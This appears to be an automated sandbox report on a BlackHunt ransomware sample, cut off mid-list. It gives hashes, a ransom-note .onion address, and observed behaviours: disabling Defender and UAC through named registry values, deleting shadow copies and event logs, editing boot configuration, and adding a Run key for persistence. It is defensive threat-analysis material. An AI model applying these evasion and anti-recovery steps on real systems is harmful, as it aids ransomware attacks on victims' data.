Analysis
-
max time kernel
126s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
18/01/2024, 23:42
Static task
static1
Behavioral task
behavioral1
Sample
6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe
Resource
win10v2004-20231222-en
General
-
Target
6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe
-
Size
707KB
-
MD5
dcbc7a74f31c0bad7b2e756bef59a31e
-
SHA1
60663dd841f5fabe733fdd5aab6e0304c46ed9f1
-
SHA256
6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e
-
SHA512
3e439a2be4bc466670038a723e0656aaad0f75ec57dc466edeecd7685d6ca20ef199bdd4b110c5b2b80078c627225c3ffd57e060ae0677cf59f7fd65cccdf614
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1z85vnh:6uaTmkZJ+naie5OTamgEoKxLWS9h
Malware Config
Extracted
F:\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 5180 fsutil.exe 14168 fsutil.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" Conhost.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection Conhost.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 6500 wevtutil.exe 14260 wevtutil.exe 14196 wevtutil.exe 14184 wevtutil.exe 5576 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 5396 bcdedit.exe 8564 bcdedit.exe 5556 bcdedit.exe 5584 bcdedit.exe -
Renames multiple (3328) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 8700 wbadmin.exe 12244 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\O: 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened (read-only) \??\H: 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\E: 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened (read-only) \??\P: 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened (read-only) \??\S: 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\Y: 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened (read-only) \??\A: 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened (read-only) \??\G: 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened (read-only) \??\M: 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened (read-only) \??\L: 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened (read-only) \??\B: 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened (read-only) \??\N: 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened (read-only) \??\Q: 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened (read-only) \??\T: 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened (read-only) \??\J: 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened (read-only) \??\K: 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened (read-only) \??\V: 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\R: 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened (read-only) \??\U: 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened (read-only) \??\Z: 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened (read-only) \??\X: 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened (read-only) \??\W: 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened (read-only) \??\I: 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened (read-only) \??\M: fsutil.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 8 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\security\public_suffix_list.dat 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\pl-pl\PlayStore_icon.svg 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\es-es\#BlackHunt_Private.key 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\hr-hr\ui-strings.js 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\SearchEmail.png 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\eu-es\#BlackHunt_ReadMe.hta 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected] 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened for modification C:\Program Files\7-Zip\Lang\eu.txt 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File created C:\Program Files\VideoLAN\VLC\skins\#BlackHunt_Private.key 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\ja-jp\#BlackHunt_ReadMe.txt 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\tr-tr\#BlackHunt_Private.key 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files-select\#BlackHunt_ReadMe.txt 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\[email protected] 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\charsets.jar 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\images\themeless\#BlackHunt_ReadMe.txt 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\inline-error-2x.png 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\rhp_world_icon_2x.png 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-il\#BlackHunt_Private.key 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\am_get.svg 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ar-ae\#BlackHunt_ReadMe.hta 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File created C:\Program Files\VideoLAN\VLC\locale\kk\#BlackHunt_ReadMe.hta 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon.png 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\hr-hr\#BlackHunt_Private.key 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\nl-nl\#BlackHunt_ReadMe.hta 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sl-sl\#BlackHunt_Private.key 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\eu-es\ui-strings.js 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\pl-pl\ui-strings.js 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fr-fr\ui-strings.js 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\uk-ua\ui-strings.js 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\tr-tr\#BlackHunt_ReadMe.txt 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\it-it\#BlackHunt_Private.key 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\da-dk\#BlackHunt_ReadMe.txt 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\pl-pl\#BlackHunt_ReadMe.hta 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File created C:\Program Files\dotnet\host\fxr\6.0.25\#BlackHunt_Private.key 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_gridview-hover.svg 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\de-de\#BlackHunt_Private.key 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\root\#BlackHunt_Private.key 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fr-fr\#BlackHunt_ReadMe.hta 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File created C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\#BlackHunt_Private.key 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef-win8.css 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\eu-es\#BlackHunt_ReadMe.txt 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\pl-pl\#BlackHunt_ReadMe.hta 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\nl-nl\ui-strings.js 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-gb\#BlackHunt_ReadMe.hta 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\plugin.js 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\root\#BlackHunt_ReadMe.txt 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\eu-es\#BlackHunt_Private.key 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\pl-pl\#BlackHunt_ReadMe.hta 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\adobe_spinner.gif 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\css\main.css 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\#BlackHunt_ReadMe.txt 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\es-es\#BlackHunt_Private.key 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\#BlackHunt_ReadMe.hta 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\hr-hr\#BlackHunt_ReadMe.txt 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File created C:\Program Files\VideoLAN\VLC\lua\http\#BlackHunt_Private.key 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\#BlackHunt_ReadMe.hta 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\da-dk\ui-strings.js 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\cs-cz\#BlackHunt_Private.key 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\selector.js 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fi_get.svg 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\dummy\#BlackHunt_Private.key 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\core_icons_retina.png 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File created C:\Program Files\VideoLAN\VLC\locale\ach\#BlackHunt_Private.key 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ca-es\#BlackHunt_ReadMe.hta 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 12568 5336 WerFault.exe 297 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 10156 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2892 vssadmin.exe 6536 vssadmin.exe 3204 vssadmin.exe 4072 vssadmin.exe 1452 vssadmin.exe 7132 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 12296 taskkill.exe -
Modifies registry class 9 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 Conhost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ Conhost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 Conhost.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ Conhost.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 12468 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe Token: SeRestorePrivilege 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe Token: SeBackupPrivilege 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe Token: SeTakeOwnershipPrivilege 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe Token: SeAuditPrivilege 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe Token: SeSecurityPrivilege 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe Token: SeIncBasePriorityPrivilege 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe Token: SeBackupPrivilege 8804 vssvc.exe Token: SeRestorePrivilege 8804 vssvc.exe Token: SeAuditPrivilege 8804 vssvc.exe Token: SeBackupPrivilege 1188 wbengine.exe Token: SeRestorePrivilege 1188 wbengine.exe Token: SeSecurityPrivilege 1188 wbengine.exe Token: SeSecurityPrivilege 6500 wevtutil.exe Token: SeBackupPrivilege 6500 wevtutil.exe Token: SeSecurityPrivilege 14260 wevtutil.exe Token: SeBackupPrivilege 14260 wevtutil.exe Token: SeSecurityPrivilege 14184 wevtutil.exe Token: SeBackupPrivilege 14184 wevtutil.exe Token: SeSecurityPrivilege 14196 wevtutil.exe Token: SeBackupPrivilege 14196 wevtutil.exe Token: SeSecurityPrivilege 5576 wevtutil.exe Token: SeBackupPrivilege 5576 wevtutil.exe Token: SeDebugPrivilege 12296 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2856 wrote to memory of 2968 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 94 PID 2856 wrote to memory of 2968 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 94 PID 2856 wrote to memory of 456 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 95 PID 2856 wrote to memory of 456 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 95 PID 2856 wrote to memory of 2260 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 97 PID 2856 wrote to memory of 2260 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 97 PID 2856 wrote to memory of 2136 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 159 PID 2856 wrote to memory of 2136 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 159 PID 2856 wrote to memory of 1192 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 101 PID 2856 wrote to memory of 1192 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 101 PID 2856 wrote to memory of 2080 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 103 PID 2856 wrote to memory of 2080 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 103 PID 2856 wrote to memory of 4300 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 106 PID 2856 wrote to memory of 4300 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 106 PID 2856 wrote to memory of 2672 2856 6d6caf8cd79fe486d2ca5aa43e50a06c5484bc6bd87a020dbccd55381266cb1e.exe 179 PID 2856 wrote to memory of 2672 2856 